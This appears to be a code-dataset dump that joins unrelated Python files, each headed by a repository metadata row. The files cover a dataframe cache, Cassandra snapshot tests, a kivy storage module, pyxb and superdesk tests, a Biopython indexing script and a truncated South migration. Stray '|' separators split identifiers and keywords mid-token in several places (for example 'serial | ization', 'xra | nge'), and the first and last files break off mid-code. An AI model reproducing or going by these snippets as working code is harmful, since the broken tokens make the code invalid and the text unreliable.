>>> expires = Timestamp('2014', tz='UTC')
>>> value = 1
>>> cache = ExpiringCache()
>>> cache.set('foo', value, expires)
>>> cache.get('foo', expires - Timedelta('1 minute'))
1
>>> cache.get('foo', expires + Timedelta('1 minute'))
Traceback (most recent call last):
...
KeyError: 'foo'
"""
def __init__(self, cache=None):
if cache is not None:
self._cache = cache
else:
self._cache = {}
def get(self, key, dt):
"""Get the value of a cached object.
Parameters
----------
key : any
The key to lookup.
dt : datetime
The time of the lookup.
Returns
-------
result : any
The value for ``key``.
Raises
------
KeyError
Raised if the key is not in the cache or the value for the key
has expired.
"""
try:
return self._cache[key].unwrap(dt)
except Expired:
del self._cache[key]
raise KeyError(key)
def set(self, key, value, expiration_dt):
"""Adds a new key value pair to the cache.
Parameters
----------
key : any
The key to use for the pair.
value : any
The value to store under the name ``key``.
expiration_dt : datetime
When should this mapping expire? The cache is considered invalid
for dates **strictly greater** than ``expiration_dt``.
"""
self._cache[key] = CachedObject(value, expiration_dt)
class dataframe_cache(MutableMapping):
"""A disk-backed cache for dataframes.
``dataframe_cache`` is a mutable mapping from string names to pandas
DataFrame objects.
This object may be used as a context manager to delete the cache directory
on exit.
Parameters
----------
path : str, optional
The directory path to the cache. Files will be written as
``path/<keyname>``.
lock : Lock, optional
Thread lock for multithreaded/multiprocessed access to the cache.
If not provided no locking will be used.
clean_on_failure : bool, optional
Should the directory be cleaned up if an exception is raised in the
context manager.
serialize : {'msgpack', 'pickle:<n>'}, optional
How should the data be serialized. If ``'pickle'`` is passed, an
optional pickle protocol can be passed like: ``'pickle:3'`` which says
to use pickle protocol 3.
Notes
-----
The syntax ``cache[:]`` will load all key:value pairs into memory as a
dictionary.
The cache uses a temporary file format that is subject to change between
versions of zipline.
"""
def __init__(self,
path=None,
lock=None,
clean_on_failure=True,
serialization='msgpack'):
self.path = path if path is not None else mkdtemp()
self.lock = lock if lock is not None else nop_context
self.clean_on_failure = clean_on_failure
if serialization == 'msgpack':
self.serialize = pd.DataFrame.to_msgpack
self.deserialize = pd.read_msgpack
self._protocol = None
else:
s = serial | ization.split(':', 1)
if s[0] != 'pickle':
| raise ValueError(
"'serialization' must be either 'msgpack' or 'pickle[:n]'",
)
self._protocol = int(s[1]) if len(s) == 2 else None
self.serialize = self._serialize_pickle
self.deserialize = pickle.load
ensure_directory(self.path)
def _serialize_pickle(self, df, path):
with open(path, 'wb') as f:
pickle.dump(df, f, protocol=self._protocol)
def _keypath(self, key):
return os.path.join(self.path, key)
def __enter__(self):
return self
def __exit__(self, type_, value, tb):
if not (self.clean_on_failure or value is None):
# we are not cleaning up after a failure and there was an exception
return
with self.lock:
rmtree(self.path)
def __getitem__(self, key):
if key == slice(None):
return dict(self.items())
with self.lock:
try:
with open(self._keypath(key), 'rb') as f:
return self.deserialize(f)
except IOError as e:
if e.errno != errno.ENOENT:
raise
raise KeyError(key)
def __setitem__(self, key, value):
with self.lock:
self.serialize(value, self._keypath(key))
def __delitem__(self, key):
with self.lock:
try:
os.remove(self._keypath(key))
except OSError as e:
if e.errno == errno.ENOENT:
# raise a keyerror if this directory did not exist
raise KeyError(key)
# reraise the actual oserror otherwise
raise
def __iter__(self):
return iter(os.listdir(self.path))
def __len__(self):
return len(os.listdir(self.path))
def __repr__(self):
return '<%s: keys={%s}>' % (
type(self).__name__,
', '.join(map(repr, sorted(self))),
)
class working_file(object):
"""A context manager for managing a temporary file that will be moved
to a non-temp |
snazy/cassandra-dtest | snapshot_test.py | Python | apache-2.0 | 23,150 | 0.003024 | import distutils.dir_util
import glob
import os
import shutil
import subprocess
import time
from cassandra.concurrent import execute_concurrent_with_args
from dtest import (Tester, cleanup_cluster, create_ccm_cluster, create_ks,
debug, get_test_path)
from tools.assertions import assert_one
from tools.files import replace_in_file, safe_mkdtemp
from tools.hacks import advance_to_next_cl_segment
from tools.misc import ImmutableMapping
from tools.decorators import since
class SnapshotTester(Tester):
def create_schema(self, session):
create_ks(session, 'ks', 1)
session.execute('CREATE TABLE ks.cf ( key int PRIMARY KEY, val text);')
def insert_rows(self, session, start, end):
insert_statement = session.prepare("INSERT INTO ks.cf (key, val) VALUES (?, 'asdf')")
args = [(r,) for r in range(start, end)]
execute_concurrent_with_args(session, insert_statement, args, concurrency=20)
def make_snapshot(self, node, ks, cf, name):
debug("Making snapshot....")
node.flush()
snapshot_cmd = 'snapshot {ks} -cf {cf} -t {name}'.format(ks=ks, cf=cf, name=name)
debug("Running snapshot cmd: {snapshot_cmd}".format(snapshot_cmd=snapshot_cmd))
node.nodetool(snapshot_cmd)
tmpdir = safe_mkdtemp()
os.mkdir(os.path.join(tmpdir, ks))
os.mkdir(os.path.join(tmpdir, ks, cf))
# Find the snapshot dir, it's different in various C*
x = 0
for data_dir in node.data_directories():
snapshot_dir = "{data_dir}/{ks}/{cf}/snapshots/{name}".format(data_dir=data_dir, ks=ks, cf=cf, name=name)
if not os.path.isdir(snapshot_dir):
snapshot_dirs = glob.glob("{data_dir}/{ks}/{cf}-*/snapshots/{name}".format(data_dir=data_dir, ks=ks, cf=cf, name=name))
if len(snapshot_dirs) > 0:
snapshot_dir = snapshot_dirs[0]
else:
continue
debug("snapshot_dir is : " + snapshot_dir)
debug("snapshot copy is : " + tmpdir)
# Copy files from the snapshot dir to existing temp dir
distutils.dir_util.copy_tree(str(snapshot_dir), os.path.join(tmpdir, str(x), ks, cf))
x += 1
return tmpdir
| def restore_snapshot(self, snapshot_dir, node, ks, cf):
debug("Restoring snapshot....")
for x in xra | nge(0, self.cluster.data_dir_count):
snap_dir = os.path.join(snapshot_dir, str(x), ks, cf)
if os.path.exists(snap_dir):
ip = node.address()
args = [node.get_tool('sstableloader'), '-d', ip, snap_dir]
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
exit_status = p.wait()
if exit_status != 0:
raise Exception("sstableloader command '%s' failed; exit status: %d'; stdout: %s; stderr: %s" %
(" ".join(args), exit_status, stdout, stderr))
def restore_snapshot_schema(self, snapshot_dir, node, ks, cf):
debug("Restoring snapshot schema....")
for x in xrange(0, self.cluster.data_dir_count):
schema_path = os.path.join(snapshot_dir, str(x), ks, cf, 'schema.cql')
if os.path.exists(schema_path):
node.run_cqlsh(cmds="SOURCE '%s'" % schema_path)
class TestSnapshot(SnapshotTester):
def test_basic_snapshot_and_restore(self):
cluster = self.cluster
cluster.populate(1).start()
(node1,) = cluster.nodelist()
session = self.patient_cql_connection(node1)
self.create_schema(session)
self.insert_rows(session, 0, 100)
snapshot_dir = self.make_snapshot(node1, 'ks', 'cf', 'basic')
# Write more data after the snapshot, this will get thrown
# away when we restore:
self.insert_rows(session, 100, 200)
rows = session.execute('SELECT count(*) from ks.cf')
self.assertEqual(rows[0][0], 200)
# Drop the keyspace, make sure we have no data:
session.execute('DROP KEYSPACE ks')
self.create_schema(session)
rows = session.execute('SELECT count(*) from ks.cf')
self.assertEqual(rows[0][0], 0)
# Restore data from snapshot:
self.restore_snapshot(snapshot_dir, node1, 'ks', 'cf')
node1.nodetool('refresh ks cf')
rows = session.execute('SELECT count(*) from ks.cf')
# clean up
debug("removing snapshot_dir: " + snapshot_dir)
shutil.rmtree(snapshot_dir)
self.assertEqual(rows[0][0], 100)
@since('3.0')
def test_snapshot_and_restore_drop_table_remove_dropped_column(self):
"""
@jira_ticket CASSANDRA-13730
Dropping table should clear entries in dropped_column table
"""
cluster = self.cluster
cluster.populate(1).start()
node1, = cluster.nodelist()
session = self.patient_cql_connection(node1)
# Create schema and insert some data
create_ks(session, 'ks', 1)
session.execute("CREATE TABLE ks.cf (k int PRIMARY KEY, a text, b text)")
session.execute("INSERT INTO ks.cf (k, a, b) VALUES (1, 'a', 'b')")
assert_one(session, "SELECT * FROM ks.cf", [1, "a", "b"])
# Take a snapshot and drop the column and then drop table
snapshot_dir = self.make_snapshot(node1, 'ks', 'cf', 'basic')
session.execute("ALTER TABLE ks.cf DROP b")
assert_one(session, "SELECT * FROM ks.cf", [1, "a"])
session.execute("DROP TABLE ks.cf")
# Restore schema and data from snapshot, data should be the same as input
self.restore_snapshot_schema(snapshot_dir, node1, 'ks', 'cf')
self.restore_snapshot(snapshot_dir, node1, 'ks', 'cf')
node1.nodetool('refresh ks cf')
assert_one(session, "SELECT * FROM ks.cf", [1, "a", "b"])
# Clean up
debug("removing snapshot_dir: " + snapshot_dir)
shutil.rmtree(snapshot_dir)
@since('3.11')
def test_snapshot_and_restore_dropping_a_column(self):
"""
@jira_ticket CASSANDRA-13276
Can't load snapshots of tables with dropped columns.
"""
cluster = self.cluster
cluster.populate(1).start()
node1, = cluster.nodelist()
session = self.patient_cql_connection(node1)
# Create schema and insert some data
create_ks(session, 'ks', 1)
session.execute("CREATE TABLE ks.cf (k int PRIMARY KEY, a text, b text)")
session.execute("INSERT INTO ks.cf (k, a, b) VALUES (1, 'a', 'b')")
assert_one(session, "SELECT * FROM ks.cf", [1, "a", "b"])
# Drop a column
session.execute("ALTER TABLE ks.cf DROP b")
assert_one(session, "SELECT * FROM ks.cf", [1, "a"])
# Take a snapshot and drop the table
snapshot_dir = self.make_snapshot(node1, 'ks', 'cf', 'basic')
session.execute("DROP TABLE ks.cf")
# Restore schema and data from snapshot
self.restore_snapshot_schema(snapshot_dir, node1, 'ks', 'cf')
self.restore_snapshot(snapshot_dir, node1, 'ks', 'cf')
node1.nodetool('refresh ks cf')
assert_one(session, "SELECT * FROM ks.cf", [1, "a"])
# Clean up
debug("removing snapshot_dir: " + snapshot_dir)
shutil.rmtree(snapshot_dir)
class TestArchiveCommitlog(SnapshotTester):
cluster_options = ImmutableMapping({'commitlog_segment_size_in_mb': 1})
def make_snapshot(self, node, ks, cf, name):
debug("Making snapshot....")
node.flush()
snapshot_cmd = 'snapshot {ks} -cf {cf} -t {name}'.format(ks=ks, cf=cf, name=name)
debug("Running snapshot cmd: {snapshot_cmd}".format(snapshot_cmd=snapshot_cmd))
node.nodetool(snapshot_cmd)
tmpdirs = []
base_tmpdir = safe_mkdtemp()
for x in xrange(0, self.cluster.data_dir_count):
tmpdir = os.path.join(base_tmpdir, str(x))
os.mkdir(tmpdir)
# Copy files from the snapshot dir to existing temp dir
dist |
SublimeText/Modelines | tests/sublime_plugin.py | Python | mit | 206 | 0.024272 | class Plugin(object):
pass
class ApplicationCommand(Plugin):
pass
class WindowComma | nd(Plugin):
pass
class TextCommand(Plugin):
pass
class Even | tListener(Plugin):
pass |
boriel/zxbasic | src/arch/z80/optimizer/labelinfo.py | Python | gpl-3.0 | 704 | 0.00142 | # -*- coding: utf-8 -*-
from | src.api.identityset import IdentitySet
from . import common
from . import errors
class LabelInfo(object):
"""Class describing label information"""
def __init__(self, label, addr, basic_block=None, position=0):
"""Stores the label name, the address counter into memory (rather useless)
and which basic block contains it.
"""
self.label = label
self.addr = addr
self.basic_block = basic_block
self.position = position | # Position within the block
self.used_by = IdentitySet() # Which BB uses this label, if any
if label in common.LABELS:
raise errors.DuplicatedLabelError(label)
|
vied12/superdesk | server/publicapi/tests/prepopulate_init_app_test.py | Python | agpl-3.0 | 2,453 | 0.000815 | # -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014, 2015 Sourcefabric z.u. and contributors.
#
# For the full copyright and license informa | tion, please see the
# AUTHORS and LICENSE file | s distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
from publicapi.tests import ApiTestCase
from unittest import mock
from unittest.mock import MagicMock
_fake_prepopulate_resource = MagicMock()
_fake_prepopulate_service = MagicMock()
_fake_backend = MagicMock(name='superdesk backend')
_fake_app = MagicMock(name='app')
def _fake_get_backend():
"""Return mocked superdesk backend."""
return _fake_backend
class FakePrepopulateService():
def __init__(self, endpoint_name, backend=None):
self.endpoint_name = endpoint_name
self.backend = backend
def __eq__(self, other):
return (
self.endpoint_name == other.endpoint_name and
self.backend is other.backend
)
def __ne__(self, other):
return not self.__eq__(other)
@mock.patch('publicapi.prepopulate.PrepopulateResource', _fake_prepopulate_resource)
@mock.patch('publicapi.prepopulate.PrepopulateService', FakePrepopulateService)
@mock.patch('superdesk.get_backend', _fake_get_backend)
@mock.patch('superdesk.app', _fake_app)
class PrepopulateInitAppTestCase(ApiTestCase):
"""Base class for the `prepopulate.init_app` function tests."""
def _get_target_function(self):
"""Return the function under test.
Make the test fail immediately if the function cannot be imported.
"""
try:
from publicapi.prepopulate import init_app
except ImportError:
self.fail("Could not import function under test (init_app).")
else:
return init_app
def test_instantiates_prepopulate_resource_with_correct_arguments(self):
_fake_app.config = {'SUPERDESK_PUBLICAPI_TESTING': True}
fake_prepopulate_service = FakePrepopulateService('prepopulate', _fake_get_backend())
init_app = self._get_target_function()
init_app(_fake_app)
self.assertTrue(_fake_prepopulate_resource.called)
args, kwargs = _fake_prepopulate_resource.call_args
self.assertTrue(len(args) > 0 and args[0] == 'prepopulate')
self.assertIs(kwargs.get('app'), _fake_app)
self.assertEqual(kwargs.get('service'), fake_prepopulate_service)
|
sergpolly/Thermal_adapt_scripts | perform_indexing.py | Python | mit | 731 | 0.012312 | import sys
from Bio import SeqIO
# see corresponding description in the project's wiki
inventory = sys.argv[1]
db_file = sys.argv[2]
seq_format = sys.argv[3]
# sanity check is ommited for such a short and simple script
# get the files names to be indexed
with open(inventory,'r') as fp:
fnames = [line.strip() for line in fp.readlines()]
# index them depending on the format
if seq_format == "genbank":
res = SeqIO.index_db(db_file,filenames=fnames,format=seq_format)
elif seq_format == | "f | asta":
get_index = lambda name: name.split('|')[3]
res = SeqIO.index_db(db_file,filenames=fnames,format=seq_format,key_function=get_index)
else:
print "Only genbank and fasta formats are accepted!"
sys.exit(1)
|
zennobjects/kivy | kivy/storage/__init__.py | Python | mit | 11,191 | 0.001072 | '''
Storage
=======
.. versionadded:: 1.7.0
.. warning::
This module is still experimental, and the API is subject to change in a
future version.
Usage
-----
The idea behind the Storage module is to be able to load/store keys-value pairs.
The default model is abstract so you cannot use it directly. We provide some
implementations such as:
- :class:`kivy.storage.dictstore.DictStore`: use a python dict as a store
- :class:`kivy.storage.jsonstore.JsonStore`: use a JSON file as a store
- :class:`kivy.storage.redistore.RedisStore`: use a `Redis <http://redis.io>`_
database with `redis-py <https://github.com/andymccurdy/redis-py>`_
Examples
--------
For example, let's use a JsonStore::
from kivy.storage.jsonstore import JsonStore
store = JsonStore('hello.json')
# put some values
store.put('tito', name='Mathieu', age=30)
store.put('tshirtman', name='Gabriel', age=27)
# get from a key
print('tito is', store.get('tito'))
# or guess the key/entry for a part of the key
key, tshirtman = store.find(name='Gabriel')
print('tshirtman is', tshirtman)
Because the data is persistant, you can check later to see if the key exists::
from kivy.storage.jsonstore import JsonStore
store = JsonStore('hello.json')
if store.exists('tite'):
print('tite exists:', store.get('tito'))
store.delete('tito')
Synchronous / Asynchronous API
------------------------------
All the standard methods (:meth:`~AbstractStore.get`, :meth:`~AbstractStore.put`
, :meth:`~AbstractStore.exists`, :meth:`~AbstractStore.delete`,
:meth:`~AbstractStore.find`) have an asynchronous version.
For example, the *get* method has a `callback` parameter. If set, the `callback`
will be used
to return the result to the user when available: the request will be
asynchronous. If the `callback` is None, then the request will be synchronous
and the result will be returned directly.
Without callback (Synchronous API)::
entry = mystore.get('tito')
print('tito =', entry)
With callback (Asynchronous API)::
def my_callback(store, key, entry):
print('the key', key, 'have', entry)
mystore.get('plop', callback=my_callback)
The callback signature is (for almost all methods) `callback(store, key,
result)`::
#. `store` is the `Store` instance currently used.
#. `key` is the key to search for.
#. `entry` is the result of the lookup for the `key`.
Synchronous container type
--------------------------
The storage API emulates the container type for the synchronous API::
store = JsonStore('hello.json')
# original: store.get('tito')
store['tito']
# original: store.put('tito', name='Mathieu')
store['tito'] = {'name': 'Mathieu'}
# original: store.delete('tito')
del store['tito']
# original: store.count()
len(store)
# original: store.exists('tito')
'tito' in store
# original: for key in store.keys()
for key in store:
pass
'''
from kivy.clock import Clock
from kivy.event import EventDispatcher
from functools import partial
class AbstractStore(EventDispatcher):
'''Abstract class used to implement a Store
'''
def __init__(self, **kwargs):
super(AbstractStore, self).__init__(**kwargs)
self.store_load()
def exists(self, key):
'''Check if a key exist in the store.
'''
return self.store_exists(key)
def async_exists(self, callback, key):
'''Asynchronous version of :meth:`exists`.
:Callback arguments:
`store`: :class:`AbstractStore` instance
Store instance
`key`: string
Name of the key to search for
`result`: boo
Result of the query, None if any error
'''
self._schedule(self.store_exists_async,
key=key, callback=callback)
def get(self, key):
'''Get the value stored at `key`. If the key is not found, a
`KeyError` exception will be thrown.
'''
return self.store_get(key)
def async_get(self, callback, key):
'''Asynchronous version of :meth:`get`.
:Callback arguments:
`store`: :class:`AbstractStore` instance
Store instance
`key`: string
Name of the key to search for
`result`: dict
Result of the query, None if any error
'''
self._schedule(self.store_get_async, key=key, callback=callback)
def put(self, key, **values):
'''Put a new key/value in the storage
'''
need_sync = self.store_put(key, values)
if need_sync:
self.store_sync()
return need_sync
def async_put(self, callback, key, **values):
'''Asynchronous version of :meth:`put`.
:Callback arguments:
`store`: :class:`AbstractStore` instance
Store instance
`key`: string
Name of the key to search for
`result`: bool
Indicate True if the storage has been updated, or False if
nothing has been done (no changes). None if any error.
'''
self._schedule(self.store_put_async,
key=key, value=values, callback=callback)
def delete(self, key):
'''Delete a key from the storage. If the key is not found, a `KeyError`
exception will be thrown.'''
need_sync = self.store_delete(key)
if need_sync:
self.store_sync()
return need_sync
def async_delete(self, callback, key):
'''Asynchronous version of :meth:`delete`.
:Callback arguments:
`store`: :class:`AbstractStore` instance
Store instance
`key`: string
Name of the key to search for
`result`: bool
In | dicate True if the storage has been updated, or False if
nothing has been done (no changes). None if any error.
'''
self._schedule(self.store_delete_async, key=key,
callback=callback)
def find(self, **filters):
'''Return all the entries matching the filters. The entries are given
through a generator as a list of (key, entry) pairs::
for key, entry in store.find(name='Mathieu'):
| print('entry:', key, '->', value)
Because it's a generator, you cannot directly use it as a list. You can
do::
# get all the (key, entry) availables
entries = list(store.find(name='Mathieu'))
# get only the entry from (key, entry)
entries = list((x[1] for x in store.find(name='Mathieu')))
'''
return self.store_find(filters)
def async_find(self, callback, **filters):
'''Asynchronous version of :meth:`find`.
The callback will be called for each entry in the result.
:Callback arguments:
`store`: :class:`AbstractStore` instance
Store instance
`key`: string
Name of the key to search for, or None if we reach the end of
the results
`result`: bool
Indicate True if the storage has been updated, or False if
nothing has been done (no changes). None if any error.
'''
self._schedule(self.store_find_async,
callback=callback, filters=filters)
def keys(self):
'''Return a list of all the keys in the storage
'''
return self.store_keys()
def async_keys(self, callback):
'''Asynchronously return all the keys in the storage
'''
self._schedule(self.store_keys_async, callback=callback)
def count(self):
'''Return the number of entries in the storage
'''
return self.store_count()
def async_count(self, callback):
'''Asynchronously return the number of entries in the storage
'''
self._schedule(self.store_count_async, callback=callback)
def clear(self):
'''Wipe the whole storage.
'''
return self.store |
jonfoster/pyxb1 | tests/drivers/test-particle.py | Python | apache-2.0 | 4,830 | 0.007453 | import pyxb.binding.generate
import pyxb.utils.domutils
from xml.dom import Node
import os.path
schema_path = os.path.abspath(os.path.join(os.path.dirname(__file__),
'../schemas/particle.xsd'))
code = pyxb.binding.generate.GeneratePython(schema_location=schema_path)
rv = compile(code, 'test', 'exec')
eval(rv)
from pyxb.exceptions_ import *
import unittest
from pyxb.utils import domutils
def ToDOM (instance, tag=None):
return instance.toDOM().documentElement
class TestParticle (unittest.TestCase):
def test_bad_creation (self):
xml = '<h01 xmlns="URN:test"/ | >'
dom = pyxb.utils.domutils.StringToDOM(xml)
# Creating with wrong element
self.assertRaises(pyxb.StructuralBadDocumentError, h01b.createFromDOM, dom.documentElement)
def test_h01_empty (self):
xml = '<ns1:h01 xmlns:ns1="URN:test"/>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = h01.createFromDOM(dom.documentElement)
self.assert_( | instance.elt is None)
self.assertEqual(ToDOM(instance).toxml("utf-8"), xml)
def test_h01_elt (self):
xml = '<ns1:h01 xmlns:ns1="URN:test"><elt/></ns1:h01>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = h01.createFromDOM(dom.documentElement)
self.assert_(instance.elt is not None)
self.assertEqual(ToDOM(instance).toxml("utf-8"), xml)
def test_h01_elt2 (self):
xml = '<h01 xmlns="URN:test"><elt/><elt/></h01>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(ExtraContentError, h01.createFromDOM, dom.documentElement)
def test_h01b_empty (self):
xml = '<ns1:h01b xmlns:ns1="URN:test"/>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = h01b.createFromDOM(dom.documentElement)
self.assert_(instance.elt is None)
self.assertEqual(ToDOM(instance).toxml("utf-8"), xml)
def test_h01b_elt (self):
xml = '<ns1:h01b xmlns:ns1="URN:test"><elt/></ns1:h01b>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = h01b.createFromDOM(dom.documentElement)
self.assert_(instance.elt is not None)
self.assertEqual(ToDOM(instance).toxml("utf-8"), xml)
def test_h01b_elt2 (self):
xml = '<ns1:h01b xmlns:ns1="URN:test"><elt/><elt/></ns1:h01b>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(ExtraContentError, h01b.createFromDOM, dom.documentElement)
def test_h11_empty (self):
xml = '<ns1:h11 xmlns:ns1="URN:test"/>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(MissingContentError, h11.createFromDOM, dom.documentElement)
def test_h11_elt (self):
xml = '<ns1:h11 xmlns:ns1="URN:test"><elt/></ns1:h11>'
dom = pyxb.utils.domutils.StringToDOM(xml)
instance = h11.createFromDOM(dom.documentElement)
self.assert_(instance.elt is not None)
self.assertEqual(ToDOM(instance).toxml("utf-8"), xml)
def test_h24 (self):
xml = '<h24 xmlns="URN:test"></h24>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(MissingContentError, h24.createFromDOM, dom.documentElement)
for num_elt in range(0, 5):
xml = '<ns1:h24 xmlns:ns1="URN:test">%s</ns1:h24>' % (''.join(num_elt * ['<elt/>']),)
dom = pyxb.utils.domutils.StringToDOM(xml)
if 2 > num_elt:
self.assertRaises(MissingContentError, h24.createFromDOM, dom.documentElement)
elif 4 >= num_elt:
instance = h24.createFromDOM(dom.documentElement)
self.assertEqual(num_elt, len(instance.elt))
self.assertEqual(ToDOM(instance).toxml("utf-8"), xml)
else:
self.assertRaises(ExtraContentError, h24.createFromDOM, dom.documentElement)
def test_h24b (self):
xml = '<ns1:h24b xmlns:ns1="URN:test"></ns1:h24b>'
dom = pyxb.utils.domutils.StringToDOM(xml)
self.assertRaises(MissingContentError, h24b.createFromDOM, dom.documentElement)
for num_elt in range(0, 5):
xml = '<ns1:h24b xmlns:ns1="URN:test">%s</ns1:h24b>' % (''.join(num_elt * ['<elt/>']),)
dom = pyxb.utils.domutils.StringToDOM(xml)
if 2 > num_elt:
self.assertRaises(MissingContentError, h24b.createFromDOM, dom.documentElement)
elif 4 >= num_elt:
instance = h24b.createFromDOM(dom.documentElement)
self.assertEqual(num_elt, len(instance.elt))
self.assertEqual(ToDOM(instance).toxml("utf-8"), xml)
else:
self.assertRaises(ExtraContentError, h24b.createFromDOM, dom.documentElement)
if __name__ == '__main__':
unittest.main()
|
AlgoLab/PIntron-scripts | Postprocessing/pintron-output-2-json.py | Python | agpl-3.0 | 9,511 | 0.001787 | #!/usr/bin/env python
from __future__ import print_function
import argparse
import contextlib
import gzip
import json
import logging
import re
import sys
@contextlib.contextmanager
def smart_open_out(filename=None):
if filename and filename != '-':
fn = filename
fo = open(filename, 'w')
if filename.endswith(".gz"):
fh = gzip.GzipFile(fn, 'wb', 9, fo)
else:
fh = fo
else:
fn = "<stdout>"
fo = sys.stdout
fh = sys.stdout
try:
yield fh
finally:
if fh is not fo:
fh.close()
if fo is not sys.stdout:
fo.close()
def parse_est_fasta_header(line):
identifier = line
if '/gb=' in identifier:
identifier = re.search('\/gb=([A-Z_0-9:]+)', identifier).groups()[0]
return identifier
def parse_block_alignment_str(line, genomic_block):
parts = line.split()
block = {'transcript_start': int(parts[0]),
'transcript_end': int(parts[1]),
'genomic_relative_start': int(parts[2]),
'genomic_relative_end': int(parts[3]),
'transcript_sequence': parts[4],
'genomic_sequence': parts[5]}
if genomic_block['strand'] == '+':
block['genomic_absolute_start'] = genomic_block['start'] + block['genomic_relative_start']
block['genomic_absolute_end'] = genomic_block['start'] + block['genomic_relative_end']
else:
block['genomic_absolute_start'] = genomic_block['end'] - block['genomic_relative_start'] + 1
block['genomic_absolute_end'] = genomic_block['end'] - block['genomic_relative_end'] + 1
return block
def pintron_alignments(alignments, genomic_block):
curr_alignment = None
for line in alignments:
line = line.strip()
if line.startswith(">"): # New sequence/alignment
if curr_alignment:
yield curr_alignment
curr_alignment = {'identifier': parse_est_fasta_header(line),
'blocks': []}
elif line.startswith("#"): # Annotation (currently ignored)
pass
elif line[0].isdigit(): # New block
assert(curr_alignment)
curr_alignment['blocks'].append(parse_block_alignment_str(line, genomic_block))
if curr_alignment:
yield curr_alignment
def parse_genomic_header(line):
parts = line.split(":")
strand = int(parts[3]+"1")
strand = "+" if strand > 0 else "-"
return {'seqname': parts[0],
'start': int(parts[1]),
'end': int(parts[2]),
'strand': strand}
def parse_introns(introns_stream, genomic_block, alignments):
introns = []
for identifier, line in enumerate(introns_stream):
intron = {"identifier": "Int{0}".format(identifier)}
(intron['relative_start'], intron['relative_end'],
intron['absolute_start'], intron['absolute_end'],
intron['length'],
intron['number_of_supporting_transcripts'], seq_list,
intron['donor_alignment_error'], intron['acceptor_alignment_error'],
intron['donor_score'], intron['acceptor_score'],
intron['BPS_score'], intron['BPS_position'],
intron['type'], intron['pattern'], intron['repeat_sequence'],
intron['donor_exon_suffix'], intron['prefix'], intron['suffix'],
intron['acceptor_exon_prefix']) = line.rstrip().split("\t")
intron["supporting_transcripts"] = {i: {} for i in seq_list.split(',') if i != ''}
for field in ('relative_start', 'relative_end',
'absolute_start', 'absolute_end',
'length', 'number_of_supporting_transcripts',
'BPS_position'):
intron[field] = int(intron[field])
# a bug in PIntron (file predicted-introns.txt) causes to report absolute
# coordinates of introns on strand '+' shifted to the left of 1bp
if genomic_block['strand'] == "+":
intron['absolute_start'] = intron['absolute_start'] + 1
intron['absolute_end'] = intron['absolute_end'] + 1
for field in ('donor_alignment_error', 'acceptor_alignment_error',
'donor_score', 'acceptor_score', 'BPS_score'):
intron[field] = float(intron[field])
if intron['BPS_position'] < 0:
del intron['BPS_position']
introns.append(intron)
# for each intron, add the alignment of the surrounding exons.
# Since different factorizations can support the same intron, the first
# step is to find all pairs of exons supporting an intron
def supporting_factors(intron):
pairs = []
for identifier in intron["supporting_transcripts"].keys():
factor = alignments[identifier]
good_left = [exon for exon in factor['blocks']
if exon['genomic_relative_end'] == intron['relative_start'] - 1]
good_right = [exon for exon in factor['blocks']
if exon['genomic_relative_start'] == intron['relative_end'] + 1]
if len(good_left) == 1 and len(good_right) == 1:
pairs.append((identifier, good_left[0], good_right[0]))
else:
logging.error("Could not find a supporting alignment of " +
"transcript %s for intron %s",
identifier, intron['identifier'])
assert len(pairs) == intron['number_of_supporting_transcripts']
return pairs
#
# Each intron has the list of supporting_transcripts.
# For each such seq we provide the suffix/prefix of the prev/next exon
for intron in introns:
for [seq, donor_factor, acceptor_factor] in supporting_factors(intron):
intron['supporting_transcripts'][seq] = {
'donor_factor_suffix':
donor_factor['transcript_sequence'][-len(intron['donor_exon_suffix']):],
'acceptor_factor_prefix':
acceptor_factor['transcript_sequence'][:len(intron['acceptor_exon_prefix'])],
'acceptor_factor_start': acceptor_factor['transcript_start'],
'donor_factor_end': donor_factor['transcript_end'],
'acceptor_factor_end': acceptor_factor['transcript_end'],
'donor_factor_start': donor_factor['transcript_start'],
}
return introns
def convert_to_dict(genomic_file, alignment_file, introns_file):
logging.info("Parsing genomic coordinates from file '%s'", genomic_file.name)
genomic_block = parse_genomic_header(genomic_file.readline().strip().lstrip(">"))
logging.info("Reading results from genomic region: %s:%d:%d:%s",
genomic_block["seqname"],
genomic_block["start"], genomic_block["end"], genomic_block["strand"])
logging.info("Parsing alignments from file '%s'", alignment_file.name)
alignments = {alignment['identifier']: alignment
for alignment in pintron_alignments(alignment_file, genomic_block)}
logging.info("Read %d alignments", len(alignments))
logging.info("Parsing predicted introns from file '%s'", introns_file.name)
introns = parse_introns(introns_file, genomic_block, alignments)
logging.info("Read %d introns", len(introns))
re | turn {'genome': genomic_block,
'introns': introns,
'alignments': alignments}
def main():
parser = argparse.ArgumentParser(
description="Convert PIntron results to a more convenient JSON format",
formatter_class=argparse.Ar | gumentDefaultsHelpFormatter
)
parser.add_argument(
'-g', '--pintron-genomic-file',
help="File containing the genomic sequence given as input to PIntron",
metavar="FILE",
type=argparse.FileType(mode='r'),
default='genomic.txt')
parser.add_argument(
'-a', '--pintron-align-file',
help="File containing the alignments computed by PIntron after the intron agreement step",
metavar="FILE",
type=argparse.FileType(mode='r'),
default='out-after-intron-agree.txt')
|
InScience/DAMIS-old | src/damis/migrations/0025_auto__del_field_task_sequence__del_field_task_stderr__del_field_task_s.py | Python | agpl-3.0 | 11,099 | 0.007208 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Task.sequence'
db.delete_column(u'damis_task', 'sequence')
# Deleting field 'Task.stderr'
db.delete_column(u'damis_task', 'stderr')
# Deleting field 'Task.stdout'
db.delete_column(u'damis_task', 'stdout')
# Deleting field 'Task.processors'
db.delete_column(u'damis_task', 'processors')
# Adding field 'Task.is_workflow_start'
db.add_column(u'damis_task', 'is_workflow_start',
